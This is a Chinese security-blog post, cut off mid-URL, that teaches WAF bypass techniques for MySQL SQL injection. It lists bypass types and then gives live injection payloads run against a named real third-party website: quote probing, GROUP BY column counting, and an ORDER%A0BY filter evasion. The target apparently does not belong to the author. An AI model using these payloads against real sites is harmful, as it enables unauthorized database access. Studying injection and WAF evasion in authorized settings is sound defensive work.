一、前言
本人喜欢遇到好的东西,乐于分享,关注freebuf有段时间了,写过两篇文章,每次写写文章,不仅仅是为了挣点稿费。而是通过此平台能够认识一些安全圈的小伙伴,互相学习,共同进步。在安全行业也有些曲折,发过工控协议fuzzing的入门教程,也发过无线安全的渗透测试脚本。这次发个web的吧。仅供学习,本人也是小菜。大牛直接飞过吧。
二、综述
最近在研究web安全,感觉不掌握点绕过技巧,没法混,在看了几天的关于sql注入绕过的方式后,大都是宏观的讲解有哪些绕过方式。简单的总结了下:
1、注释方式绕过
2、编码方式绕过
3、大小写方式绕过
4、缓冲区溢出导致拒绝服务从而绕过(fuzz技术)
这是目前几天所看到的,有好的思路的小伙伴,可以随时交流。之前建了一个无线电安全研究的群:163309269。欢迎不限于研究无线电、物联网安全的大牛加入。
这次主要是看到国外大牛对mysql注入测试的一些思路,然后自己整理下,分享下。对于只看宏观文章,没有实战的演练,无疑是很好的案例。
三、具体实现
本次测试是以如下站点为例:http://www.ecgi.org/wp/wp_id.php?id=123
1、首先加入单引号http://www.ecgi.org/wp/wp_id.php?id=123’,出现下面提示:owner has denied your access to the site.然后尝试bypass。
2、然后在输入如下测试链接:http://www.ecgi.org/wp_id.php?id=123’oRder By 100-- - 会再次阻塞我们的 IP地址,拒绝我们访问。
3、尝试Group By,测试链接为:http://www.ecgi.org/wp/wp_id.php?id=213’Group By 100 – - 出现Unknown column ‘100’in ‘group statemeat’。这里代表Group By可以工作,waf不能阻塞。
然后用如下测试:这里代表是25列。
4、下面测试如何Bypass Order By。通过手工测试发现只要Order和By连在一起就会被waf阻塞。通过测试payload 为:http://www.ecgi.org/wp/wp_id.php?id=213’Order%A0By 100 出现报错,说明waf没有过滤,已经可以bypass。
这里还有一种方式:payload为:http://ww